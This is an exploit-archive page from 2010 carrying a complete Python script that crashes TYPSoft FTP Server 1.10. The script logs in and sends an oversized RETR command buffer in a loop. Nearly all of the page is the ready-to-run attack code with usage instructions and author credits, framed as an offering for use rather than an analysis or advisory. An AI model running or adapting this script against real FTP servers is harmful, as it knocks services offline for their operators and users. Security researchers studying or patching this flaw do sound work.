Home / os / win7

TYPSoft FTP Server RETR Command DoS

Posted on 14 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>TYPSoft FTP Server RETR Command DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=================================== TYPSoft FTP Server RETR Command DoS =================================== # Exploit Title: TYPSoft FTP Server RETR Command DoS # Date: 5/13/2010 # Author: Jeremiah Talamantes # Software Link: # Version: 1.10 # Tested on: Windows XP, SP2 (EN) # CVE : N/A #!/usr/bin/python print &quot; #################################################################&quot; print &quot;## RedTeam Security ##&quot; print &quot;## TYPSoft FTP Server RETR Command DoS ##&quot; print &quot;## Version 1.10 ##&quot; print &quot;## ##&quot; print &quot;## Jeremiah Talamantes ##&quot; print &quot;## labs@redteamsecure.com ##&quot; print &quot;################################################################# &quot; import socket import sys # Description: # RETR command overflow with no PORT specified # Define the exploit's usage def Usage(): print (&quot;Usage: scriptname.py &lt;IP&gt; &lt;username&gt; &lt;password&gt; &quot;) print (&quot; Credit: Jeremiah Talamantes&quot;) print (&quot;RedTeam Security : www.redteamsecure.com/labs &quot;) # Buffer buffer=&quot;AAAA&quot; * 496 def exploit(hostname,username,password): i=0 while i &lt; 10: i=i+1 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print (&quot;Error: unable to connect to host&quot;) sys.exit(1) r=sock.recv(1024) print &quot;[+] &quot; + r + &quot;: iteration number: &quot;,i sock.send(&quot;USER &quot; + username + &quot; &quot;) r=sock.recv(1024) sock.send(&quot;PASS &quot; + password + &quot; &quot;) r=sock.recv(1024) sock.send(&quot;RETR &quot; + buffer + &quot; &quot;) sock.close() if len(sys.argv) &lt;&gt; 4: Usage() sys.exit(1) else: hostname=sys.argv[1] username=sys.argv[2] password=sys.argv[3] exploit(hostname,username,password) sys.exit(0) # End # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP